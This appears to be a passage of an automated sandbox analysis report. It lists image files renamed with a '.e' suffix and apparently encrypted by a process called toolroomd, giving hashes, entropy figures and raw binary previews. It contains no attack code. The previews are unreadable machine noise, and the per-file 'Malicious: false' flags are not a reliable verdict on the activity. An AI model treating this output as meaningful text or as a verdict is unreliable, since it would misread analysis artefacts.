Entropy (8bit):	6.302720974811561
Encrypted:	false
SSDEEP:	12:WYZ0fMHRg3gE1q2YftjRq2YftjWC/l/sewLYTc+qGm7:+0HRg3gE1HijRHijWwdsePc0m7
MD5:	637BB78183B74252792825638C922E8C
SHA1:	0663A70CFE3FBE1D6AC6E8B0CCD1850F57D83184
SHA-256:	B65547839BFA49ABB536C98CDA89F6676B318DE2F7E11E15AA0E801258FC6F69
SHA-512:	B479329B15E296049EB31B5D9EEBA00F00F516316737DE00A184A57C19E7DF6A6983F6F74BFCDF82A70F676A44D5110954E52FEC12FE3294BBF580172ACB215D
Malicious:	false
Preview:	.<.\|.....f.A..>..D.....XRM...&..& ."..h.).6...6.e..4......h)..1..cG\|..pI.;..b6.u#..N.f.`D..t).d......mS.\|9...'U......(......t.n.. .lvO..we..\.7...............Y.K......p..\.=,g.K'U......(......t.n.. .lvO..we..\.7...............Y.K......p.......9..f./.>...'fHa.F"....T...@...S..._.I@.m?.z.1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.night-land-carplay-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	922
Entropy (8bit):	6.790093036282852
Encrypted:	false
SSDEEP:	24:r5oeqGFVI9kFVIR8xT8egKUGFVI0QFVIR83rcWsePc0m7:rGeqErd1gKUE4PHNpq
MD5:	8361C99F9182504E0BFA685D2E283069
SHA1:	6364027C2BE113CB167F8F72FAD0D8EDF1E96AF9
SHA-256:	5C11FF99CCB6480F2B45DF2B2AC0703A5F0F7A70B4E26738A9F69102783E354A
SHA-512:	C9AC12FD3D9D47ABF0506F5E169D799F7C2DBF9051A43D96E0CA8508DBFCC4D45FCBEC16124CAD994147EACACE2EBA620808A054651A81EFF7F7191F442D5421
Malicious:	false
Preview:	.<.\|.....f.A..vM..j..<".q..o........"..h.).6...6.e..4......h)..1..c+.........{..bz..u~w...%....'.=.<>........r.Q!a...g...O....@..B.E,......,@.%)..F.J.rp...PY...Fj.k..T....C.H..m.[..X....)-i...,@.%)..F.J.rp...PY...Fj.k..T....C.H..m.[..X..y.<...Y.B.....&9'.i.....T...I>......e.&(..[..X..y.<...Y.B.....&.Y.q$..A.T...I>........r.Q!a...g...O....@..B.E,......,@.%)..Pu.h....>........r.Q!a...g...O....@..B.E,......,@.%)..F.J.rp...PY...Fj.k..T....C.H..m.[..X..[rcE....,@.%)..F.J.rp...PY...Fj.k..T....C.H..m.[..X..y.<...Y.B.....&9'.i.....T...I>.......s.^ #q.../-.Z7.E\.:{.....8..i.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.night-park-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	19491
Entropy (8bit):	7.984216847891948
Encrypted:	false
SSDEEP:	384:8kTclBy0t+K55qkzjFpj8JQen83xAHMnjBFJ3XRRiZS/jPcmlcdSA6tycqRFsANz:86TKdjbOp83LRR5jtUT6gnnDNy1Q
MD5:	8BF04B24169D5EA02734C0AD9F3CFD50
SHA1:	00E28ABA0E295B4A3641F7D3D00F77C93C0743ED
SHA-256:	955F9236A56ED86E449164E445F504838C0878DC416F2B1307DC45A5D82FF625
SHA-512:	71FE40F3137DCC0C35BF24F96C9AB4D22BDB6E78E91B60E8989C5C0B6104525BB57809D63164F157FD85F12864C7431106CD893A962D186D6D18CC49ED3EA837
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f..EHo.!N.@..6...j.0..Wm..@C(Wr+U.c......].Y{...T'.. .4.YT..X.C.......&..<..q.Fq.g;...u....Q..vw:Cb.$rG.`..G.1B.F.zNZ..w\.I..,Cpn"Y....}`O~..S.....w<..].4.M..)...@.;.Y........^...Y`z.NC.z.b..5!Y=d.!.F.\|..SrS.5..mQ../0k...Rw....r..u..8...4%....@.mx.,%..;......:.Hu.4 U ,..X..Xtb"/:............iF..#z#.kE. ..9w..N.G....w.......\|.^N.[=...[..'.8..s..eN...o.c.8X.6._.o^:....X5.x$...r.._.[h.e..hd...7.+I,05A.....\...1......y..\..\B..~W!_..,.Ox...$.:1.....~........:[..e...(.Ib..M..a......7....}V..G...O..0...&Sux..4"5j...%..........%C..+.+j..C.\'...^f./).p\.",...\|F.>..?s.....r..Yg..-O.P.......3X.]#$...i:.2...>...bd...Y4'.1..[`.F..~..x^..z......&.2.iu.Q......Z[G....l'.......@.n...l...M.Pe.*3Z7w...B..u..kE.>.'.q..f..dH.%.&z.'.m1g......]...m...1j..v.J.....'..m4.1(.`W..&.-Ij.9....A.)...k......l.+$t2.D...+.0..H=..y. O$.j.....9.....tT?_..c...3;F....[=../.9v.<(T.oC...u.k....i".I..<.@.

/Users/berri/Library/Caches/GeoServices/Resources/.night-park-2@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	61653
Entropy (8bit):	7.995369744314388
Encrypted:	true
SSDEEP:	1536:bX+VhQAKO9pcs5l788sSaAsl3oGRWHLRw+kp6sUeVV:K3QABKs5mia5pRWPT9W
MD5:	2CD666A899FF1F7A82FE60C204EB1C06
SHA1:	059A36FBCA4605E841E521B8B94732069D3F8B82
SHA-256:	1CD951BE36B698363E13AB637D224D80EBEB805393B9450310D31BDCE90D5BCF
SHA-512:	6E09C05A62581D20D4B27B7297A72F9DF2A7B789DEA4F82946B4D3F17FD0A5960D415801BE5277C21EDD2750391E71D717786E437710BC902B4EB07CF505C270
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3..........%..SB4f.F.!=....q4.B.I.R..4.8...x1.^h.........\|.j&.2$....._=....kU.@D.W:. ..)......e...GPn.eF.f.o.WU...T..5Ypr.c...m..<......Ra..t..q(.{.....WO..yq.........m.z...0.#.%..A....V.......i.j..S .....S.J.z...&\o:a`.PO..,....'.........v2.....Q..:./....\|.m....U?.`.!..6.GB6T.~..3G.........J..FL..$...=q..a.X...L.7...9.V....r....B.iP.......x.)..:..=..]kx..SW......L..s.>g.....B.X.ex....n...Q.fA.....$r....69.......;.gz'=U.....es..3K...#Gzx.#c..2n..K..K..&...>.FV.l\|..d'oV.,s......v=..[t.`..MX.R.1..>S.L..v.u.>.....~.....\....N:..4..g..\|.\i../.p.,G.7..T..5.#.b....o.$....N.F^g..W..E.,....)...%~3....X.]......S....+.;....Y..+..g{....l....A.c..>.).........b...qK]"..~0.,........6....8.,[..}}N]B....7..3'Ud.!..%(]G./Z..[!.v..Q.Z...o.H.4.^v....z.Ii.......).....p.W....zm.\|.\2O...&2Q..%r.........U.j....r..Q.ZU..!#.].....=.#.....-.._1..a(.......`...o....o.{3.-t.u..!...

/Users/berri/Library/Caches/GeoServices/Resources/.night-water-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	8042
Entropy (8bit):	7.943828476337538
Encrypted:	false
SSDEEP:	96:3AmJinL5wVINeU7OX79jOYG+DcE9huvW5geNUXmU5rT8p57GFr2CY2udhv21yZ9+:QvOw/7OXZqYGSciHBw/rn/kvrZ9k/yy
MD5:	E9A7FF647162F34C03BEFF7EB29AB64D
SHA1:	6D2959C380EF2EF2FD1E5D678BB95CF202EEBBFF
SHA-256:	B6C364498DE602DDC5F0C9E01E233BD2F2EA1E7CBCFF4894BFBCE99B81A57D48
SHA-512:	A4F5542D60DDC6BDECFDF90C4D7C40C13E077FFD963A5E5D58576F38956D6B05CF78F71AAF1DAF6BB9B216D7909952A7F64426A81A2038C595507B58DC037000
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f..j+2..)..!k....,..u....X.B.&...w}..RO..1T.x.~.k. ....Z.;..NA&.'....(....E...Y....?..........7.4..ywh..u>9..z\|}.I.....K.\Y...p.(+...8z.+<.....d..PE..[Z..!..X.].<.U......NS.4.......[.(7..XK.7.......S.=J...v\....},LJ.........G...#\|.....jK."..-.....3YXB......I...P...ucT...l{.,e._........k..y6./A.mFl..Y..`.u.....ZK..N...z;.f.k.....q...e7.<..kx...E..-#.A..6z..Q........z.<.b..uM...V}...P.......;d.\.....>k.x.^....E..8v#...45...M..$h.9......#.od.?f=6U.#.\.......B.....MJ9,.Ie.9......=E.L.s0(.$....j.J.$..F..L...K3_..S..0.....]..........i.Ir%...\.R.#+8.KKo.>..6...R..n.lr0..w. "..MR...t......L(s....$..s1#.<....I.........f..4x......L..~.....'..)..wf1C.....S..(......OS@.E.Y".-....`O.U....>f...8B.E^s...LW>.....J..W.].Y.....q..ui..t.Z).*.h.@r+R.=..de.]...E:...4D/.......A..4.q...ad....;.V1.K0...a..........9....VA-.8.L...^........u..Bl(."./#..zA..U0......W`hJ...k-.I.(.<..L7=6:

/Users/berri/Library/Caches/GeoServices/Resources/.night-water-2@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	26555
Entropy (8bit):	7.987899553932753
Encrypted:	false
SSDEEP:	384:xODMO3vojolvfUwTd+dvLBJCOYa+Pol7wVYv49gEHsYNBjCr9MuJgR:IoOAjoj0P+QSYvesYbm6uJgR
MD5:	440FBB700E195466663FA8568F7E4753
SHA1:	B2A8A340F1EDA97B67F8FF18782FCD1649A5CC18
SHA-256:	81D6E6DF48527691AFA33ACC33CA9176761B3178B69B00DD7FAAB834DD1070E1
SHA-512:	04D083E01746ED66836D22DEAEDBDBFEEA2748FDC28D35C496EC2B9A8F9957DA53FDB69A8706A82A87F7F7F0276F0321810306084D20D3BA83DBE9239190CB6F
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3....%..[(.P..s.%'W...P........."Ij...j.f'3...8..E.....nV0o.On....P...S4.A-.....b.d.Jq..du..Y....o......B..zT.A....c..a..p...@.s.g.Y.D....&.5i.........U..4P..o...W.LO\..;..G.l....R.+.)0}#n....(t]C.Xrq[Y.B..(..L..S..u.S"........jq.I.S...%.?.....Uk.m..WV.-..B...h="....._.0#.o.[L}.i..7@..f...-.......C..M[.+....k..G ......?..r..e..A..NA..w=H...jp...k..o.._qW.a..MI.....mQf.....E...)b.EC...=H...\. [.T{..X.L16.^:..V..#.4.:U.PI=.._....f.c.,#5....c.q....#.^..W;........G..I.d[.y....a.L.p.)....I.s ....~...h.P..D1....0.}.&.....m_U'."o..<............].-.B.e.K. ....!.d..8..d5(?.O..C...>.7P..}/.W..A....=OV..].. ..q.R....l.....W....D..c............r...C.......G.ma.T.C[s.n...K..V.[..Mq\\|...#.(.M..k.......a..y..%Rr[..4i.b..P..DSG......LqR.P.L+.......3_D.\...H..y.0.s0.........0;..,..;16(...xfP..v9H\...sL..._.a.C.f.,.. ....3.e.....+l.aG.q5.C.@.x..U....%b.;8[....o.....cF.v.^.a\...

/Users/berri/Library/Caches/GeoServices/Resources/.no_data-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10234
Entropy (8bit):	7.9629747059282
Encrypted:	false
SSDEEP:	192:Ugrgn/gCJsMhMfEvpYILzJPtNWTvF6442861KQEFn3sHVYTdezRbwsgOI:Ugpg8EXltNWzF6MFKQucH+pezRYOI
MD5:	9218D10FD20B7F9B8421E363AD723147
SHA1:	CDC6272D3F3E1FAC3B6B8DB8C8DD5A086AEBB504
SHA-256:	633984C928375E4D5FF0507F89F04F69425FFA64A1E9B0DB678A27E3D64A5680
SHA-512:	17193F9768941DC9CBCDCDB6B844A16F3913F9A66F308251803788C4CF551DAC9EDF1EA5F9547183C4762CF0A89B03FE93CCE248279E8F2A7DDB7CE6BBB85799
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7..sC.V0.:p.^.Z..?....-.R.D:......1pJ......E.E.c.>..}..#r( ..Y.RM......e....(..o..I.%l.S...Q.I..."Q.....0...+v1mp.,7.&.)?.E..j..O..w[.DRs.3G.J..))....8."{..o..28.H.,....[..6...!..{...../.P.Qu...X);.N.=.>}..NL..$]..x..,O:..:....s}u.....\\|G...-QO..g...KY..!Sj:.}..e;..p.n..[.......Ho....V.17.4.1r.Uzq.1......\@...8..7..tk&.....H.$.6g...[-..=.-.E....=.~...zo....K4.Od...V.tf.....y.@0...d...QO...8h.6.9k..!.k..mQ....O...S.8.........;Z.....`.~Jfe..4....V..,.)Ar..X.....5.0..G.....5E.}..;.p.F..........J..,.re..........\k.H.>iO..$......:...{e..U........7..U.\.^....(.B...."{.n.\|y@r....6........3Ha..1.....SD..N.wc+....t....>.T.8....9..?\|D:....)l.:A...%..z.b.($pf$.,.......2J.._y.9n....L..S..n.....G+. ..O75...(..f........p......>.....L9.{Q.......Y..-..Y..a.6.;}..9.....v.n...pF....{.{...1..s.k....xH...yNv....'.....q..n..'.\.,.g..~.!.g...Y(..-o..1GUS....e."3.....vb..w.C.h..Q...^1....[.G..B}.T.R...MA.

/Users/berri/Library/Caches/GeoServices/Resources/.no_data-2@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10234
Entropy (8bit):	7.9629747059282
Encrypted:	false
SSDEEP:	192:Ugrgn/gCJsMhMfEvpYILzJPtNWTvF6442861KQEFn3sHVYTdezRbwsgOI:Ugpg8EXltNWzF6MFKQucH+pezRYOI
MD5:	9218D10FD20B7F9B8421E363AD723147
SHA1:	CDC6272D3F3E1FAC3B6B8DB8C8DD5A086AEBB504
SHA-256:	633984C928375E4D5FF0507F89F04F69425FFA64A1E9B0DB678A27E3D64A5680
SHA-512:	17193F9768941DC9CBCDCDB6B844A16F3913F9A66F308251803788C4CF551DAC9EDF1EA5F9547183C4762CF0A89B03FE93CCE248279E8F2A7DDB7CE6BBB85799
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7..sC.V0.:p.^.Z..?....-.R.D:......1pJ......E.E.c.>..}..#r( ..Y.RM......e....(..o..I.%l.S...Q.I..."Q.....0...+v1mp.,7.&.)?.E..j..O..w[.DRs.3G.J..))....8."{..o..28.H.,....[..6...!..{...../.P.Qu...X);.N.=.>}..NL..$]..x..,O:..:....s}u.....\\|G...-QO..g...KY..!Sj:.}..e;..p.n..[.......Ho....V.17.4.1r.Uzq.1......\@...8..7..tk&.....H.$.6g...[-..=.-.E....=.~...zo....K4.Od...V.tf.....y.@0...d...QO...8h.6.9k..!.k..mQ....O...S.8.........;Z.....`.~Jfe..4....V..,.)Ar..X.....5.0..G.....5E.}..;.p.F..........J..,.re..........\k.H.>iO..$......:...{e..U........7..U.\.^....(.B...."{.n.\|y@r....6........3Ha..1.....SD..N.wc+....t....>.T.8....9..?\|D:....)l.:A...%..z.b.($pf$.,.......2J.._y.9n....L..S..n.....G+. ..O75...(..f........p......>.....L9.{Q.......Y..-..Y..a.6.;}..9.....v.n...pF....{.{...1..s.k....xH...yNv....'.....q..n..'.\.,.g..~.!.g...Y(..-o..1GUS....e."3.....vb..w.C.h..Q...^1....[.G..B}.T.R...MA.

/Users/berri/Library/Caches/GeoServices/Resources/.park-16.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	31875
Entropy (8bit):	7.989077173822198
Encrypted:	false
SSDEEP:	384:rG9oVUkhI4+nX1O70kM3QOB7KUWASOjGdT7oyp36jxuJj4lC0sza0mWNd3ebrWYo:r590lO5yQOdKUWkjGdY1UW0mYYorZpkq
MD5:	EA5A1C431B8144D9BC03DC73479D561A
SHA1:	11ED80BB39820189834312F8F40B7DBC24883468
SHA-256:	6B05E5DE7CFE6C26B70732756BC6542540BD27700209E6D20772CB7A4D68B568
SHA-512:	CAD93F02E65343C888E611A31B6E513F2584E415A06BFAA165060428B3E378A1E061FAD6BBDA02B8FD2AFC6F8324ADC74501CC8B1A26C73BCE4F6CB62702F404
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f....t.An.m.>....u.pgB;.!..o..1.....s.....lX...\|.2W..X........v/.B.Zi."...g.....wt)...w'.U..d....z$4..Q'.a.........{Q4.S. L..5...+"g......L....E"..q..@..B.8...;....)....F.....!p..^.[8?.5_..VO.0.@.#E..F.?.~..K..K.Li..n.?%..?O....T..........!I..9...7.n.....8..n.....]..h2m.J..C....%......<[&...........=*&!V..x..J\...p....H..hd....q..wR.E...).m..\%..`+TH..qH.$...y..[Y.y@..s. ..O]ut.q.4."s.+>.."M .........v.......r!..7....Al5\[.-H!B...ha.Y.....J.4.....R.`f.;.2...).gm......g$Y4.D.....^O^+...w..0v/~..g4cg.&;..3.m...VK...}%...$5XS...?C..x.0.Y.n&i.....,#"...N7.t..~...TC...\R.........Bom.b..kF...Ej......vG!.)..L.................A..&.s..Y..x.k...u.N....V..H.~7....E.D.....9.-..C./#..4...ql3>_O.d...P....".S.O/..._u....n..c_.W....%.......J$....,...d...\....?z.$......D.<.ph.....L.J.c+..f./....;.=fFH.B.....$s.X.......#..'...B4...s.D.S...l..,^iy.F.....P.>.&...W.sxV

/Users/berri/Library/Caches/GeoServices/Resources/.park-16@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	64445
Entropy (8bit):	7.9965554652711806
Encrypted:	true
SSDEEP:	1536:LMyuyrvoEDOwJhRgs7gplOLeE8MYmIVR11zL:L1u4OwjZ7gEegYmQRv
MD5:	7E1F73FF291AA99A831ABAD397E25295
SHA1:	E7A3B468E86A665165A5C07C61AA0C02100A2B17
SHA-256:	DF49A640D5D7442E916CA666024982DBE38BA0588CD710445DEBA464966B37B1
SHA-512:	A96854B5EA7252BA466772F944F6AF3956C1240654234A7131EFB6A9311D4F690F7BBD3FB84D0FB062F2079B8249B8C55634A06F4605498185A33D630C121682
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...c.....h.,.....-E.L.f>....y.+]&.......z...2.lR...T..=$.L.^?6A6#n...=..mua.nQP.2.Q..x.^a).....}.`.HZF.........j.+....Mg..x'.....m.......\1....y.."?.`.z."J.4.R4......W......v...<..i..l.<..y.\..S.=.^7.J...I..a....5..@m.}...x...J3.9%..J.W..8y!_..X.....Y.s]..r.W.3;....v:.9..r..d.o.[H:.c..).v..6PI.5...d.6:..k...."M.mt.../.\|..(S.A...TlME...d.@.>..)..Nk.K....\M..7...3......B~...].s.-y.........W..j...(.-8...v....F.....Xt.....m....2..J......C"...$.....P.U...7.Iu......M..6....u.rux.DpT$...6....<.X.9....~.\|..4i..n.p2.B).&.P6...[k.o'..U.......Z....B?..,...,.._.W..n........8..G.f.G.`...S..Q.m...W:x.....>..P?..5..7...~...r....^...)..M...d>..2....Os1..Y.R..c.r.j..).H..,.>c..G...z..[[o.Z.....x3..o.6f5.....w,z.m.F;......VvR+'...)....x.S..%..%-<.e.[..'{....s&aP.7[J.d..O-'...@..........!p...X.....5......5...[....*.....'...8.7..p.v.^~\|...v.K.\l...~.7..0...,.....-c.kee..S.CT.%..e&.g.

/Users/berri/Library/Caches/GeoServices/Resources/.road-noise-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	48428
Entropy (8bit):	7.994551137844811
Encrypted:	true
SSDEEP:	768:VAXIpvyy6xCmeBc7jjx34EA57/s82h6bD+ZlGtQRpugH47mfzb+A3PNFts:6XIYdCmeBc7jjxoEAm84kKlGtepLMmrs
MD5:	52DCDDCEDEE52D7D4F8B7F3C01DCDB2D
SHA1:	C587961FD7D4BA2E81E3BA49D0F97C402D3E4C01
SHA-256:	9F3E4C5D8494F488E6F980913DEA92741769BAF8BF46313F1B34C4BA115E4BDD
SHA-512:	0C664C10589EF4F8DC414795902D07490F144E5C5430142E88C8DE6E3335936795F1F554BD13401CF3F6BBCACE80A6A7AB1676BA06058C3FB676CF78879627AB
Malicious:	false
Preview:	.<.\|.....f.A..vM..j..<".q..o........"..h.).6...6.e..4......h)..1..h.....%...Zh...:.!+.4..g..Y....a...u..W.'........0.s...P..:...A.......(.S.......<v..S..8...d..,...V.0 ...c..1#.....^.x...5............a.G...d..rj.).y..$,.F:f'...Uj..........JNbr.%......b...`M.....$D.^..;..`.%{.Us......j..3.\.Sf..t...`o$q..)..8oi41ly%^....z..K..0..1...MD....V..R.f. 90...m.........-C..\|.P.w..v..Q<n...\..prl_..@. ......d/h...Yy.....M..d.f_....K\R%3xzp.(.Xm;8.../n...D...R.\c.:v..[..2j~=....Z..A:).-....S~,...3. ..y..2......bBm..^..q.gwF.n...0......j.}....-.....]?..'..z..]..[.Kl.S......^t.p8..Q..../...=.2.B....sG..+.Q..........S.h....wi..zR..aN.^.....q...U....8.z.c.^..j..m.%L\a..;(!....,~5X..r9G.........=..'~......E,@..BK.nD.g...ft..[I2........_.=.uo..5....;..\.o.d.p6..E.,>.-.N:...<.?.L...Oa.+R...`c.L..Ot+.."...6.w.?...\|".=n#.....KY)...../.k.....j.Q...N.-m.Y.j)...1UBmh...X...O.<~....DJ.hk...d....3.K9r....q0g.fN.%..2..6...._.".&...n.....Q.:.T..A_.TO9..

/Users/berri/Library/Caches/GeoServices/Resources/.road-noise-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	16066
Entropy (8bit):	7.977640928640754
Encrypted:	false
SSDEEP:	384:V0zFiMNky6FcFn4xOK1TpI/q74D1cs+c0zBwgjZrXz0i:V0z4xy6FcFY114D1db+wqVD
MD5:	98153ABB59331D1FC19CCFB498CF7C47
SHA1:	99772A4B72688A28548952ED7D0A223B4A7FBA09
SHA-256:	02D5E2DC92709BFF0691E9D5E7462EEC5017A5868AF162512CC8CF6307F75058
SHA-512:	7904D63E80C2B7C5D7529D3292FC0071A61F2E0E8385118776F3DDBE797B5A9C7A0F975BDFF79421BF72EA94CCB276A97DD9D5512E12013C69C6637B697E5344
Malicious:	false
Preview:	.<.\|.....f.A..>..D.....XRM...&..& ."..h.).6...6.e..4......h)..1.q.N-^:......2..._.(..{{..`...T1.Y.A.4..3S.....I..>..t.q1....z.%..D4z..u..@...,.....IR......1..Z....}.d..0.<w.Z.dp.B@$...S..hvPMa.7_^k.C....R9(.L.a:..I....k....4...9..o.i...G.kEO[....z.(\a...h{.b..N5].q.g.........]....c5.m.o....e..(.m.DP.3..~..(..~... ..$gn..$~..L0.....:.8....V.g..P.-..p)....m........ ...:/./r.M..,?E.X..j...`[.........:.P.}M>W.(..s..C.%..>.`...]...6...-.....I....6_..d..g..u.e..:..yM.ds...f..w....Lt...............js.Y./1Zk.B.pmu+..=..hFO.n..=.....-o.s>...g3h.x_..T.0U..l...;... .ub..g;..V..l.){W..(^Z...2&.<....... ...'`...#.9.Pow......5...8..y....x..`..2>....q.>m.b_o.\76..Yh.fsL.......Q.........i.......+.'.....R..-..q.V.X .LZ.."..wI.$..i.\|...-u$..=.-..3....8....Nh.#...s.>......7O....9.....&..n....*g.......I...x ..K..P......G9.."....9M...K2<$..Z..O.r.T....nW.`..A..ih....P..(?v.rf-..J..^A[..gP.Ri.!R.S.....+.J`.\7...Y..Ka...d2...@(.....^...m..5..7V.$B...=g.

/Users/berri/Library/Caches/GeoServices/Resources/.road-noise-light-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	20843
Entropy (8bit):	7.983536755615237
Encrypted:	false
SSDEEP:	384:XhBmjpCbdr0u2Kk8jGxmjZdaQmYiFvkDuHZIw1TODrpfgUj:Ker0bUGxmjZoC/n
MD5:	C4B7DC4F5C09D565ECA75A5C15EA1196
SHA1:	0A77A07D597EA5172DB2EE9AEA7958C6F423D861
SHA-256:	EC56DBF447EEE1402F887F54A0D9DEE87C7052E9308779D095B7705D3AAFA5C5
SHA-512:	83477B6B6EF486A8B30744C62E0067F72897BDF365666A2C93BF6A1E07A2C9A3D88B597A74F2B6705A1E01744CD94823D678BC08EBE62D51D94C4DC41B90DFE9
Malicious:	false
Preview:	.<.\|.....f.A..>..D.....XRM....\.....M..5..co2=.......G....J.@D.s~...i....Xs..89..E#.S....(.f....f.K.....?...{F...<.L.x..b.U2e..,..b.<...Gh.D......I-.p$.......&..^6...\|..e.Q{'.V.G..?.S_..p...$......\|..p..O.:_...A"..Sv.+.......1+\|...u..6.....V.I"../@.o..u.EBx...0.H..d..J.n..~...X1e..........f5.s..f....Cj....61./...5.e.2j...'.SK..lB......._..jTT...U]4...iH...5.?x..P............r...oT.......6....I#,..F...8.....k..^(...K...7.Z3.}-..M9j.T.X3i.@.o...;_..-._J.,]x...-r...%>N..W2..\.g..%.'$.2../Q!).]..T6....S{..~E=.i..y8_...k1F...".)\/.F$w.$;.a.D%.......o...S...A....,.....t....`1Q...o./I.Y..v..N...h...}.K!..$h.L..y....:.....}<.&..4a.G.....5l..N..`.Gt...a.w.....tM......D.V..K}....../V..W.i....&.=...M.WR..t....9vx..8...N.T.HqJ....1.b...Qd-H.L.N.(q.{..[..F.x.....!.p.h..:V.9&e.I../...SK.Yc.^....5...x#f...!........C.H./A..q....?..2A.-.3./0V.....9r.....67.F.O.t.{...;.........(... <..*<.I..5B\....Hc.bVi.p_.E?&.....W..P...X........EJ..K....[...

/Users/berri/Library/Caches/GeoServices/Resources/.road-noise-light-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	54261
Entropy (8bit):	7.9958280149447845
Encrypted:	true
SSDEEP:	768:nN3Ud4ahLkj8pUgjBriPwwa/w9jXBF0DUqd7cjncWmMBXYgiYfZj3QYT+Q+7NYw:NsUIriRa/ckUccQWhNfBJ+FNYw
MD5:	02CA52DA20A93D2FBDFA48273540319D
SHA1:	59674D9EC972B847550E889E345748036A7F75CF
SHA-256:	1E60F1EB09184C97FF07E4AB33CFDBA6A6CA79675221B8E86BC6C6C185D3A72A
SHA-512:	2728A71EA6AAE865DE13735C019BD39A44CD563E587BDE7CBE1A3B60AC896C5177103991AFFC1647EE92C0C384024808204057C5A4F0DD4CC5B70713780999E8
Malicious:	false
Preview:	.<.\|.....f.A..vM..j..<".q..o...svp.......M..5..co2=.......G....J.@D.s~...i....Xs..89..E#.S....(.f....f.K.....?...{F...<.L.x..b.U2e..,..b.<...Gh.D......I-.p$.......&..^6...\|..e.Q{'.V.G..?.S_..p...$......\|..p..O.:_...A"..Sv.+.......1+\|...u..6.....V.I"../@.o..u.EBx...0.H..d..J.n..~...X1e..........f5.s..f....Cj....61./...5.e.2j...'.SK..lB......._..jTT...U]4...iH...5.?x..P............r...oT.......6....I#,..F...8.....k..^(...K...7.Z3.}-..M9j.T.X3i.@.o...;_..-._J.,]x...-r...%>N..W2..\.g..%.'$.2../Q!).]..T6....S{..~E=.i..y8_...k1F...".)\/.F$w.$;.a.D%.......o...S...A....,.....t....`1Q...o./I.Y..v..N...h...}.K!..$h.L..y....:.....}<.&..4a.G.....5l..N..`.Gt...a.w.....tM......D.V..K}....../V..W.i....&.=...M.WR..t....9vx..8...N.T.HqJ....1.b...Qd-H.L.N.(q.{..[..F.x.....!.p.h..:V.9&e.I../...SK.Yc.^....5...x#f...!........C.H./A..q....?..2A.-.3./0V.....9r.....67.F.O.t.{...;.........(... <..*<.I..5B\....Hc.bVi.p_.E?&.....W..P...X........EJ..K....[...

/Users/berri/Library/Caches/GeoServices/Resources/.sand-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	21427
Entropy (8bit):	7.985670611202356
Encrypted:	false
SSDEEP:	384:D+pqcjQcq1wDcm2AiQYQiyjVtkzHIkG2klZzgvwKluQN0msaWof:DAQcqyYmPLTJtt32kUvwGuQmkt
MD5:	1EC51D21660B6D3A4AAB70AD06580FF1
SHA1:	C790410A850B33052AA07E54203EE34CF1676E31
SHA-256:	8BC0D0001186B1B6EFC2E54074FE77DAB268C9DB41BBB4CE164FD1B18BE10957
SHA-512:	23DA7232205537D8BEA9D60E01E42D9FCE9430392A899320C2E0DDFC2CD6BD4FC380F7D94E9AA80404D16166886150CAE47DEBDD814625928DA76739562D9D45
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f..[......P......h..i.b....A$...b.......K....,.........Xc-.S.z@W.AY.]..O.....f....]...K...U...5.?D}.N.P.J..v..U..w.j.yl3..T.7bH...yB....../.4.B.....C.....`....!....n#....r.f.6s..b+.oR.<.[....c.)N.D0a~pr.9.{...}...;M.&]T)i......"g!.sE....C...29..V7^\|.z.EL......K.+(.[.[.,Hrvf.L.............U.^D%Q.....b#..E.3.P...+:t....7<.F...6W).tI.}M.....J...qN....&<,....... ..G..2...I.6[<...M{e.......s....D...ru.[.......Lv.?'F.........}I..jLc.Wm?....Q.5).G....7....SG.9."z%D.!.C.[,...s.<.."(..\|..1j.m4...Mp .<&.>...]...'`.W....h..n.&b..1.x.s..+&..^..}......K3.D.hm..c9>EN...@L....w.....6x[.u..o'..\|...\.>\......kf.....\|.0.B.c#.....\|...[.. c.E6....@h.&..\w ..2z...l.H..... 